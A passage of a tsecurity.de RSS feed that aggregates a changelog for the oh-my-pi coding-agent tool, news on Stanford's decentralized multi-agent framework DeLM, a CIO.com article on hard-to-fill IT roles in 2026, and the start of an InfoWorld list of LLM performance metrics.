<h3>Fixed</h3>
<ul>
<li>Fixed <code>alignat</code>/<code>alignedat</code>/<code>gatheredat</code> rendering in <code>latexToBlock</code> so the required <code>{n}</code> preamble is not rendered as visible math content</li>
<li>Fixed math parsing to leave non-math LaTeX snippets (for example <code>\begin{itemize}</code>) and fenced code blocks as literal text instead of rendering them as math</li>
<li>Fixed <code>renderInlineMarkdown</code> to handle top-level display-math tokens so raw <code>$$...$$</code> delimiters are no longer leaked</li>
<li>Fixed inline math span detection so escaped dollars and currency-like patterns (such as <code>$5</code> and <code>$10</code>) are not converted as math</li>
<li>Fixed Mermaid diagram rendering in Markdown code blocks to clip each ASCII line to content width before wrapping, preventing preformatted diagram rows from fragmenting</li>
<li>Fixed fullscreen overlays losing keyboard focus to hidden prompt surfaces, which could make settings unresponsive while a background approval request was pending (<a href="https://github.com/can1357/oh-my-pi/issues/2789" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2789/hovercard">#2789</a>).</li>
<li>Fixed <code>bun test</code> runs inside a real terminal leaking TUI output: <code>ProcessTerminal</code> now honors a headless test-runtime default, so frame paints, <code>start()</code> capability probes (OSC 11 / DA1 / kitty), the progress keepalive, notifications, and teardown escapes no longer reach the developer's terminal, and stdin raw mode is never engaged. Previously <code>#safeWrite</code> only skipped on <code>!process.stdout.isTTY</code>, so a developer running the suite in an interactive terminal saw stray status/editor boxes and probe queries. Terminal-contract suites opt back into real I/O via <code>setTerminalHeadless(false)</code></li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added <code>escapeXmlText</code> utility to escape XML-significant characters <code>&amp;</code>, <code>&lt;</code>, and <code>&gt;</code> in element body text</li>
<li>Added <code>isTerminalHeadless()</code> / <code>setTerminalHeadless()</code> to centrally suppress real-terminal side effects (stdout escape/frame writes, stdin raw mode, CSI/OSC capability probes, SIGWINCH, window-title changes, emergency restore) under the test runtime. Defaults on when <code>bun test</code> sets <code>NODE_ENV=test</code>; terminal-contract tests opt out via <code>setTerminalHeadless(false)</code></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(tui): keep overlay focus above hidden prompts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4676940403" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2795" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2795/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2795">#2795</a></li>
<li>fix(coding-agent): load discovered hook factories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677385980" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2798" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2798/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2798">#2798</a></li>
<li>fix(cli): skip empty session persistence by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677808827" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2804" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2804/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2804">#2804</a></li>
<li>fix(coding-agent): prefer Codex default auth by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678553738" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2810" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2810/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2810">#2810</a></li>
<li>fix(coding-agent): expand local auto-thinking classifier budget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678723092" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2814" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2814/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2814">#2814</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v16.0.2...v16.0.3"><tt>v16.0.2...v16.0.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stanford's DeLM cuts multi-agent task costs 50% — without a central orchestrator]]></title>
<description><![CDATA[One of the assumptions behind today’s AI frameworks is that agents require a “boss” at the center; this orchestrator runs the show, routes requests, and makes sure the whole system doesn’t descend into chaos. That assumption may be wrong, and the cost of carrying it could be measured in inference...]]></description>
<link>https://tsecurity.de/de/3602933/it-nachrichten/stanfords-delm-cuts-multi-agent-task-costs-50-without-a-central-orchestrator/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602933/it-nachrichten/stanfords-delm-cuts-multi-agent-task-costs-50-without-a-central-orchestrator/</guid>
<pubDate>Tue, 16 Jun 2026 20:47:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>One of the assumptions behind today’s AI frameworks is that agents require a “boss” at the center; this orchestrator runs the show, routes requests, and makes sure the whole system doesn’t descend into chaos. </p><p>That assumption may be wrong, and the cost of carrying it could be measured in inference dollars and coordination latency. A new Stanford framework called a decentralized language model, or DeLM, is built on the premise that agents can coordinate directly, without routing every update through a central controller.</p><p>DeLM's shared knowledge base serves as a “common communication substrate” so that agents can build upon one another’s verified progress without having to route every interaction through a main agent to “merge, filter, and rebroadcast,” Yuzhen Mao and Azalia Mirhoseini, co-developers of the framework, explain in a <a href="https://arxiv.org/pdf/2606.10662">research paper</a>. </p><p>It’s a system that’s not only possible, but desirable in certain instances. “Agents can build on prior findings, avoid repeated failures, preserve constraints, and recover detailed evidence only when needed.”</p><h2>The challenges of traditional multi-agent systems</h2><p>In a typical centralized multi-agent system, a main agent breaks tasks into subtasks, assigns them out to multiple sub-agents in parallel, waits for responses, merges and summarizes intermediate progress, then launches a next wave of orders based on collected context. </p><p>While this is a natural way to scale LLM reasoning, the Stanford researchers argue that it scales poorly. Every useful finding, partial finding, and failure must be reported back to the main agent, which then determines what information to merge and rebroadcast to the agents below it. </p><p>“As the number of subtasks grows, this controller becomes a communication and integration bottleneck,” Mao and Mirhoseini write. Further, the main orchestrator may “dilute, omit, or distort” useful information, leading to lost progress. </p><p>This bottleneck also occurs in long-context reasoning scenarios. Once it receives reports back from subagents, a main agent will typically group related concepts, data points, and other materials together in an unsupervised learning loop. It may then pre-assign these "evidence clusters" to sub-agents before knowing what surfaced material is actually relevant or whether it’s combined correctly. </p><p>When a subagent receives this insufficient context, it will essentially get confused and return to the main agent, kicking off another retrieval or delegation round. “This back-and-forth makes coordination slower, more iterative, and increasingly constrained by a single overloaded main agent,” the researchers write. </p><div></div><h2>What DeLM addresses and how it works</h2><p>DeLM, by contrast, is built around parallel agents, a shared context, and a task queue. </p><p>Shared context is essentially a curated store of “gists,” or information summaries that other agents might find useful. These include verified and evidence-based findings alongside partial findings and documented failures; they also point to detailed evidence that agents can pull from based on their specific task. </p><p>A task queue is then a set of subsequent pending subtasks that agents can claim independently. </p><p>“Agents write compact, verified updates into a shared context that later agents can read directly,” the researchers write. Useful findings, failures, and constraints accumulate as a “shared problem state,” rather than passing through a central controller.</p><p>The pipeline looks like this: </p><ul><li><p><b>Initialization:</b> Inputs are broken into different work units and added to a queue; </p></li><li><p><b>Parallel execution: </b>Agents work independently and in tandem, pulling tasks and  reading shared context as they progress. </p></li><li><p><b>Compression and verification:</b> Results are compressed into reusable “gists” that are checked against supporting evidence. Only gists that are fully verified are shared with the group. </p></li><li><p><b>Additional work (if needed): </b>When the queue is emptied, the last agent to return an answer inspects all the shared context to determine whether further work is required. </p></li><li><p><b>Final step: </b>The last agent determines that no more steps are required and returns the final answer. </p></li></ul><p>Agents “exchange progress through shared state, asynchronously claim ready tasks, and scale more adaptively as the number of subtasks grows,” the researchers explain. </p><h2>How DeLM performs in the wild</h2><p>With DeLM, agents can avoid redundant exploration; reuse and build on each other’s discoveries and failures; and focus on unresolved issues.</p><p>The framework can be particularly useful in software engineering test-time scaling, when models are given time to “think” to improve their reasoning and problem-solving capabilities. Different agents can explore their own hypotheses or pursue reasoning paths in parallel, while still sharing intermediate progress. One example is concurrent de-bugging. </p><p>DeLM is also suitable for long-context reasoning and multi-document question-answering; agents can simultaneously examine their own evidence clusters (collections of papers, code, or other materials) at the same time, while maintaining a “global compact view” of accumulated evidence. </p><p>The researchers contend that it makes agentic tasks more accurate and significantly cheaper. This is backed by its performance on real-world benchmarks: On SWE-bench Verified — which evaluates how well AI models and agents solve real-world software engineering problems — it performed 10.5% better than the strongest baseline and reduced cost per task by roughly 50%. </p><p>But it can go beyond coding: On LongBench‑v2 Multi‑Doc QA — which assesses LLMs’ ability to handle long-context, real-world problems — DeLM had the highest accuracy across four model families, including GPT‑5.4, Claude Sonnet, Gemini Flash, and DeepSeek‑V4‑Pro. </p><p>DeLM outperforms other models on SWE-Bench <a href="https://x.com/Mao_Yuzhen/status/2064735740949622910">for a number of reasons</a>, as Mao detailed on X. </p><div></div><p>First, agents share failures. In ordinary parallel runs, when one agent follows the wrong path, that failure stays private, and subsequent agents may waste time (and money) pursuing the same dead end. But with DeLM, failed hypotheses are written into shared context. </p><p>“Later agents can read them as constraints, avoid repeated exploration, and redirect their search toward more promising fixes,” Mao said. </p><p>Additionally, constraints, once verified, are immediately added to agents’ shared context. This means they become a binding shared state. “Later agents inherit them, build around them, and avoid repeating globally invalid simplifications,” Mao said. </p><p>Crucially, DeLM keeps shared progress compact enough to reuse. It is unfoldable, meaning agents see short gists by default, but can choose to unfold them into more detailed summaries and raw evidence. </p><p>As the researchers note, providing all raw documents and traces gives agents the maximum amount of information, but that can overwhelm their context windows and ultimately increase costs. </p><p>“If agents shared full traces, each worker would need to read long command histories, file dumps, failed edits, and intermediate reasoning, turning coordination itself into another long-context bottleneck,” Mao said. </p><p>On the other hand, while sharing compact summaries is cheaper, important details and evidence can be lost, resulting in less reliable reasoning. </p><p>Unfolding, therefore, provides “coarse-to-fine” opt-in access. This can improve accuracy and cost.</p><p>Ultimately, with a framework like DeLM, agents can be more efficient because they are prevented from repeatedly reading the same documents or rerunning the same failed analysis; more effective because useful findings are propagated across parallel threads; and more robust because they only share verified claims. </p><p>For enterprise builders, DeLM challenges a core assumption: that every multi-agent workflow needs a central controller. The SWE-bench and LongBench-v2 results suggest the decentralized model isn't just theoretically cleaner — it's faster, more accurate, and roughly half the cost.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Weekly Roundup: AWS FinOps Agent in preview, Gemma 4 on Bedrock, Kiro Pro Max, and more (June 15, 2026)]]></title>
<description><![CDATA[This week, New York City is hosting AWS Summit, bringing together builders, customers, and AWS teams for a full day of announcements, demos, and technical sessions at the Javits Center. I wrote blog posts for some of the Summit launches, so I am excited to see them go live this week. I just won’t...]]></description>
<link>https://tsecurity.de/de/3600292/ai-nachrichten/aws-weekly-roundup-aws-finops-agent-in-preview-gemma-4-on-bedrock-kiro-pro-max-and-more-june-15-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600292/ai-nachrichten/aws-weekly-roundup-aws-finops-agent-in-preview-gemma-4-on-bedrock-kiro-pro-max-and-more-june-15-2026/</guid>
<pubDate>Tue, 16 Jun 2026 00:07:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This week, New York City is hosting AWS Summit, bringing together builders, customers, and AWS teams for a full day of announcements, demos, and technical sessions at the Javits Center. I wrote blog posts for some of the Summit launches, so I am excited to see them go live this week. I just won’t be […]]]></content:encoded>
</item>
<item>
<title><![CDATA[The 11 hardest IT roles to fill in 2026 — and what’s changed]]></title>
<description><![CDATA[These days, hiring a specialist is relatively easy — a SOC analyst, an ML researcher, a cloud architect. Those requisitions close in weeks. What stays open for six to nine months are hybrid roles: engineers fluent in AI who can go deep in code and also understand the business. “Three skills, one ...]]></description>
<link>https://tsecurity.de/de/3598737/it-nachrichten/the-11-hardest-it-roles-to-fill-in-2026-and-whats-changed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598737/it-nachrichten/the-11-hardest-it-roles-to-fill-in-2026-and-whats-changed/</guid>
<pubDate>Mon, 15 Jun 2026 12:17:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>These days, hiring a specialist is relatively easy — a SOC analyst, an ML researcher, a cloud architect. Those requisitions close in weeks. What stays open for six to nine months are hybrid roles: engineers fluent in AI who can go deep in code and also understand the business. “Three skills, one person, small pool,” says <a href="https://www.linkedin.com/in/nealsample/" rel="nofollow">Neal Sample</a>, chief digital and technology officer at Best Buy. “These hybrids are the future of IT — and are hard to find right now.”</p>



<p>Two years after AI leapfrogged cybersecurity as the most difficult IT skill to hire for in CIO.com’s State of the CIO survey, the top of the list hasn’t budged. AI/machine learning and cybersecurity are now tied as the hardest roles to fill, according to the <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">2026 State of the CIO survey</a>, with data science and analytics close behind. But while the rankings look familiar, the nature of the talent crunch has shifted. The hunt for LLM engineers and prompt specialists has given way to demand for people who can operationalize AI at scale, govern its risks, and wield it effectively without blindly trusting it.</p>



<p>Meanwhile, risk management has climbed into the top five for the first time, while business/IT automation is holding steady near the top. And pressure has eased on roles that dominated just a few years ago: cloud architecture has dropped, and <a href="https://www.cio.com/article/3951133/remember-when-developers-reigned-supreme-the-market-for-software-coding-goes-soft.html">application development has fallen off</a> the list entirely as AI tools reshape what developers actually do.</p>



<p>“The most challenging roles are anything that needs to be bundled with AI,” says <a href="https://www.linkedin.com/in/nielnickolaisen/" rel="nofollow">Niel Nickolaisen</a>, IT advisor and field CTO at Valcom Technologies. Security analysts who can use AI to improve cyber posture while bad actors sharpen their attacks. Software engineers skilled at using AI platforms to design, build, and deploy. “There are simply not yet enough of these people available,” Nickolaisen says.</p>



<p><strong>Hardest-to-fill IT roles: 2026 vs. 2024</strong></p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td>Skill</td><td>2026 rank</td><td>2024 rank</td><td>Change</td></tr><tr><td>AI/machine learning</td><td>#1 (tie)</td><td>#1</td><td>Steady</td></tr><tr><td>Cybersecurity</td><td>#1 (tie)</td><td>#2</td><td>Rising</td></tr><tr><td>Data science/analytics</td><td>#3</td><td>#3</td><td>Steady</td></tr><tr><td>Business/IT automation</td><td>#4</td><td>#4 (tie)</td><td>Steady</td></tr><tr><td>Risk management</td><td>#5</td><td>#8 (tie)</td><td>Rising</td></tr><tr><td>Software engineering</td><td>#6 (tie)</td><td>#6 (tie)</td><td>Steady</td></tr><tr><td>DevOps/DevSecOps</td><td>#6 (tie)</td><td>#11 (tie)</td><td>Rising</td></tr><tr><td>Enterprise architecture</td><td>#8 (tie)</td><td>#10 (tie)</td><td>Rising</td></tr><tr><td>Cloud services/integration</td><td>#8 (tie)</td><td>#12 (tie)</td><td>Rising</td></tr><tr><td>Cloud architecture</td><td>#8 (tie)</td><td>#6 (tie)</td><td>Falling</td></tr><tr><td>Design thinking/UX</td><td>#8 (tie)</td><td>#15 (tie)</td><td>Rising</td></tr></tbody></table> </div></figure>



<p><em> Source: Foundry/CIO.com State of the CIO Survey, 2024 and 2026</em></p>



<h2 class="wp-block-heading">AI hiring grows up</h2>



<p>IT leaders seeking LLM expertise can take heart in the fact that the frenzy around LLM engineers has eased. “Prompt engineering as a standalone job title was a short-lived fad,” Best Buy’s Sample says. “Today, it’s a baseline skill.”</p>



<p>But what most organizations are looking for now is different: AI product engineers who can stand up agents, build testing frameworks, manage the cost-latency-quality triangle, and deploy AI at scale. They’re also trying to fill <a href="https://www.cio.com/article/4137022/new-it-roles-emerge-to-tackle-ai-evaluation.html">governance</a> and <a href="https://www.csoonline.com/article/4029862/how-ai-red-teams-find-hidden-flaws-before-attackers-do.html">red-team</a> roles that didn’t exist on anyone’s org chart three years ago.</p>



<p>“The center of gravity moved from people who build models to people who wield them,” Sample says. “That’s a very different resume.”</p>



<p>Gen AI and LLM tools have become intuitive enough that the skills organizations need have evolved toward more agentic AI and less prompt engineering. “We need people who understand workflows, process simplification, and can work with an agent platform to automate work and tasks,” says Nickolaisen of Valcom Technologies. “I expect this will change over the next year or two as the agent platforms get more intuitive. We can then focus our reskilling on how to make agents more autonomous.”</p>



<p>The challenge is that AI is evolving so rapidly — and being invested in by everyone from cloud providers to the startup ecosystem — that experience at one company may not translate to another, and what someone learned six months ago may already be outdated.</p>



<p>“Best to look for people with a broad understanding and ability to consume market shifts constantly happening,” says <a href="https://www.linkedin.com/in/scotthicar/" rel="nofollow">Scott Hicar</a>, a fractional technology leader focused on the private equity market.</p>



<h2 class="wp-block-heading">Cybersecurity: A skills crisis, not a headcount crisis</h2>



<p>Cybersecurity’s rise to share the top spot with AI reflects more than just demand. It also signals a fundamental shift in the challenges organizations face.</p>



<p>Six in 10 organizations now say skills gaps outweigh staffing shortages as their primary workforce challenge, according to the 2026 <a href="https://www.sans.org/white-papers/2026-cybersecurity-workforce-research-report" rel="nofollow">SANS/GIAC Cybersecurity Workforce Report</a>, a 20-point shift from just a year ago. And the consequences are measurable: 27% of cybersecurity leaders surveyed report breaches directly tied to capability gaps, while 61% say that team stress has increased over the past two years.</p>



<p>The skills scarcity isn’t at the entry level; it’s at the senior architect tier. “People who can make a good security trade-off under real constraints, rather than read a dashboard, are hard to find,” Best Buy’s Sample says. “Those people are naming their price.”</p>



<p>The strain on security teams is compounding. Attack surfaces have expanded with every SaaS addition, API, and agent deployed. Cyber adversaries are using the same AI tools as defenders. Security teams are burning out.</p>



<p>Nickolaisen frames it in operational terms: “Cyber with AI is the biggest need because it’s the most near-term threat. If the bad guys can use vibe programming to build an attack in less than an hour and revise it in minutes, I need to be able to respond and modify my response in near real-time.”</p>



<p>The SANS research found that 74% of organizations say AI is already impacting the size of their cybersecurity teams and the roles within them. SOC and security analysts are the roles most likely to be cut as AI reshapes security teams, and these are <a href="https://www.csoonline.com/article/4058190/ai-is-altering-entry-level-cyber-hiring-and-the-nature-of-the-skills-gap.html">precisely the entry-level positions</a> where the next generation of cybersecurity leaders traditionally learned their craft. At the same time, new roles are emerging, including AI/ML security specialists, AI security engineers, and AI governance analysts.</p>



<h2 class="wp-block-heading">The rise of ‘second-order’ AI skills</h2>



<p>Automation and risk management skills have both climbed into the State of the CIO’s top five hardest-to-fill roles for the first time — and they’re rising for the same reason.</p>



<p>“AI blew out the surface area,” says Sample of Best Buy. “Every agent you deploy is a new automation and a new risk, and most governance, risk, and compliance (GRC) and ops functions weren’t designed for that pace.”</p>



<p>With automation, the need isn’t for more RPA developers; that work has become a commodity. Organizations need people who can <a href="https://www.cio.com/article/4157466/cios-reimagine-business-processes-to-reap-ai-benefits.html">look at a process and decide what to automate</a>, what to retire, and what to redesign. “That’s three jobs welded together,” Sample says. “Business analyst, process engineer, and technologist. Anyone who does all three well is rare — and expensive.”</p>



<p>The shift from chatbots to agents is driving much of this demand for automation talent. “The first wave of agents won’t invent new tasks; they’ll replace how existing work gets done,” says <a href="https://www.linkedin.com/in/ameyakanitkar/" rel="nofollow">Ameya Kanitkar</a>, co-founder and CTO at AI measurement platform Larridin. “Enterprises are rearchitecting critical business workflows around fully or semi-autonomous agentic flows, and the demand for people who can build and operate these is massive.” The catch, he says, is that it requires an uncommon combination: understanding how systems work and how the business runs.</p>



<p>Risk management presents a similar challenge. GRC functions built for SOX and PCI compliance aren’t necessarily optimized for model risk, prompt injection, or third-party AI exposure. “We’re hiring for a discipline that’s maybe five years old, against a job description that’s twenty years old,” Sample says. “That gap is the problem.”</p>



<p>One capability that’s grown more critical is <a href="https://www.csoonline.com/article/4002765/third-party-risk-management-is-broken-but-not-beyond-repair.html">third-party risk management</a>. “With AI being embedded in most of what we purchase and use, [the question becomes] do I need both more people and a better-governed process to assess the AI that comes from third parties?” says Nickolaisen of Valcom Technologies.</p>



<p><a href="https://www.linkedin.com/in/jamesstanger/" rel="nofollow">Dr. James Stanger</a>, chief technology evangelist at CompTIA, notes that risk management requires a different mindset than many technical workers bring to the table. “You’ve got to know your technical stuff, but you have to understand the business use of the technical stuff — otherwise you’re addressing technology, not risk,” he says.</p>



<h2 class="wp-block-heading">The midlevel squeeze</h2>



<p>AI coding tools and low-code platforms haven’t reduced the demand for software engineers, but they’ve changed its shape. A strong engineer with good AI tooling now produces roughly what three engineers did just a few years ago. “The squeeze is on the middle tier: the people whose day job was wiring APIs together,” Sample says.</p>



<p>Engineering hiring is bifurcating, says Larridin’s Kanitkar: strong demand for experienced leaders who bring judgment and ownership, and for junior talent that’s AI-native from day one. “The squeeze is in the middle,” he says. “People coasting on midlevel execution are finding themselves on the wrong side of the job market.”</p>



<p>AI tools are pushing engineers to think more like architects. “At one time, the industry was looking for IT ‘plumbers’ who could code,” CompTIA’s Stanger says. “Now the industry is demanding people who can think architecturally and in terms of risk and privacy. We don’t need keyboard code punchers; we need proactive designers who use AI to model potential performance issues.”</p>



<p>For DevOps specifically, a consolidation is under way. “Platform engineering is the growth role,” Sample says. “The generic DevOps engineer title is being absorbed into platform or site reliability engineering (SRE), and I don’t think it survives the next few years as a distinct function.”</p>



<h2 class="wp-block-heading">Cloud has stabilized</h2>



<p>Cloud roles have become easier to fill. Already visible in 2024, the trend has only continued.<strong></strong></p>



<p>Most organizations have reached a cloud steady-state, says Valcom Technologies’ Nickolaisen. “Unless something big changes, we have our public, private, and on-prem workloads,” he says. “The skills of my system administration teams are adequate to support that.”</p>



<p>Training programs have caught up with cloud, Stanger notes — though he adds it’s hard to say exactly why the pressure has eased.</p>



<p>“Cloud has matured into a real profession,” Sample adds, “and more people have done it at scale for many years now.”</p>



<p>Some cloud specialties remain hard to fill: FinOps, regulated-industry migrations, and reverse migrations. And certain workloads are coming back on-prem. “Especially AI inference, where the unit economics in cloud can be brutal at scale,” Sample says. “That’s shifting the skill mix again, and nobody’s resume says, ‘I can move workloads off the cloud intelligently.’”</p>



<h2 class="wp-block-heading">What’s working to close the gap</h2>



<p>If there’s one point of agreement among IT leaders, it’s this: Upskilling and internal mobility are more effective than external hiring in terms of speed, cost, and retention.</p>



<p>“Our most productive AI engineers in 2025 were not hired as AI engineers,” says Best Buy’s Sample. “They were strong software engineers, upskilled with good internal training and real projects.”</p>



<p>Outside expertise offers less advantage than it used to. AI has moved so fast that contractors aren’t necessarily ahead of internal teams, according to Nickolaisen. “Once my teams are over the initial hump and embrace AI, their skills develop quickly,” he says.</p>



<p>The key is trust. “Assure the teams that we will not use the resulting productivity to get rid of people, and it’s amazing what can be done to accelerate the delivery of value,” says Nickolaisen.</p>



<p>One change that dramatically expanded Best Buy’s talent pool was to stop treating AI hiring as a separate pipeline. “We hire engineers, then we introduce them to our take on AI,” Sample says. “That one reframe opened a pool at least 10 times larger and gave us better output.”</p>



<p>Stanger advocates cross-skilling, apprenticeship-based mentoring, and pathway-based learning — tactics that focus on building capabilities rather than checking off credential boxes.</p>



<p>“Instead of the tired, old, pedigree-based lens that asks, ‘Where is your four-year degree from,’ the most progressive hiring institutions are now asking, ‘What are your skillsets, and where can you take us with them?’” says Stanger.</p>



<p>Chasing the latest job titles carries risk. “The prompt engineer hiring wave of 2023 — those roles aged out in eighteen months, and the people who took them are reskilling now,” Sample says. “Hiring a job title rather than a capability has a short shelf life. That lesson is already repeating with agentic AI in some places. It won’t age better the second time.”</p>



<h2 class="wp-block-heading">Soft market, hard problem</h2>



<p>The tech hiring market is sluggish, driven by uncertainty about AI-driven job displacement, economic conditions, and what Nickolaisen characterizes as “pretty much everything in our lives.” But for the skills that matter most, the competition remains fierce.</p>



<p>“The next couple of years are critical,” Kanitkar says. “This is when the separation happens.” The frontier moves every day, which means the gap between IT organizations that master the shift and those that resist it will only widen.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[33 LLM metrics to watch closely]]></title>
<description><![CDATA[We’ve all heard the mantra from the quants in the business community: you can’t manage what you can’t measure. And if that’s true for human intelligence, it should be true for the artificial kind too.



How do we measure agents and large language models (LLMs)? We’re just beginning to come up wi...]]></description>
<link>https://tsecurity.de/de/3598559/ai-nachrichten/33-llm-metrics-to-watch-closely/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598559/ai-nachrichten/33-llm-metrics-to-watch-closely/</guid>
<pubDate>Mon, 15 Jun 2026 11:03:23 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>We’ve all heard the mantra from the quants in the business community: you can’t manage what you can’t measure. And if that’s true for human intelligence, it should be true for the <a href="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html" data-type="link" data-id="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html">artificial kind</a> too.</p>



<p>How do we measure <a href="https://www.infoworld.com/article/3812583/what-you-need-to-know-about-developing-ai-agents.html" data-type="link" data-id="https://www.infoworld.com/article/3812583/what-you-need-to-know-about-developing-ai-agents.html">agents</a> and <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" data-type="link" data-id="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">large language models</a> (LLMs)? We’re just beginning to come up with statistical metrics. Here are several of the most common metrics that designers and users toss about when they’re evaluating a model.</p>



<h6 class="wp-block-heading">[ See also: <a href="https://www.infoworld.com/article/4152738/27-questions-to-ask-before-choosing-an-llm.html" data-type="link" data-id="https://www.infoworld.com/article/4152738/27-questions-to-ask-before-choosing-an-llm.html">27 questions to ask before choosing an LLM</a> ]</h6>



<h2 class="wp-block-heading">Time to first token</h2>



<p>How long does it take to generate the first token? For real-time applications with time constraints, faster responses can be essential. It’s well-known that people hate waiting even a few milliseconds. The teams that develop user interfaces learned decades ago that it’s important for the software to respond quickly when a human is waiting for an answer. Even a few seconds of delay mean that the human will wander off to another window to check some email or place some bet on a prediction market. Time to first token is a good measure for models that will be working directly with the fickle human intelligences and their latent attention deficit disorder.</p>



<h2 class="wp-block-heading">Time per output token</h2>



<p>Take the total time it takes to respond and divide by the total number of tokens. The time to first token measures how long it takes to start a response and this measures the average speed as the model through all of the tokens. In basic LLMs, this value is generally fairly constant. Once the prefill is done and the LLM enters the decode phase, the output tokens usually appear at a constant stream. When the output is long enough, the startup time to first token is amortized away. In some of the more complicated architectures with loops for planning or gathering data from various tools, the average speed can vary as the model shifts in and out of making agentic decisions.</p>



<h2 class="wp-block-heading">Tokens per second</h2>



<p>This is just the reciprocal of the average time per token. Sometimes it is reported separately for different stages in the pipeline.</p>



<h2 class="wp-block-heading">Throughput (requests per minute)</h2>



<p>If a system supports more than a single user, tracking the number of different requests makes sense. These throughput numbers can be quite useful for measuring the power of some of the newer pipelines that are more efficient when they’re answering multiple prompts at the same time.</p>



<h2 class="wp-block-heading">Error rate</h2>



<p>Not every request gets an answer. The error rate tracks how often rate limits, timeouts, or model “refusals” get in the way. Better accounting tracks each independently because the number of failures in each category can be very different.</p>



<h2 class="wp-block-heading">Token efficiency</h2>



<p>Not all work tokens are visible and not all tokens are part of the final outcome. This measures how much work is done to produce the final result. As models become more complex or agentic and the pipelines become more sophisticated, the efficiency tends to drop. Agentic reasoning and strategic planning typically require more tokens that don’t appear in the final answer. This is generally a measure of how expensive a model might be to run.</p>



<h2 class="wp-block-heading">Tail latency</h2>



<p>It’s all well and good to measure the average time to answer, but in some cases a few very slow responses can really color people’s judgement. Some applications require good performance all of the time. Would you want to ride in an autonomous car that gets steering instructions very quickly “on average” instead of always? What if that’s only 99% of the time? Tail latency uses a mixture of queuing theory and detailed measurements to track the worst moments in the long tail of the latency graph. It’s useful when even occasional delays are problematic. </p>



<h2 class="wp-block-heading">Total cost of ownership</h2>



<p>Projects that use an API or buy output from providers just look at the cost per 1M tokens. They’re effectively renters. The groups that are buying GPUs and paying for electricity, though, will add up these costs and other indirect costs like depreciation and maintenance to come up with a number that estimates how much the tokens really cost to produce. This value will depend upon demand and utilization rates—that is, on how many users are sending in prompts and how efficiently the model fits in a particular GPU and its RAM.</p>



<h2 class="wp-block-heading">Parameters</h2>



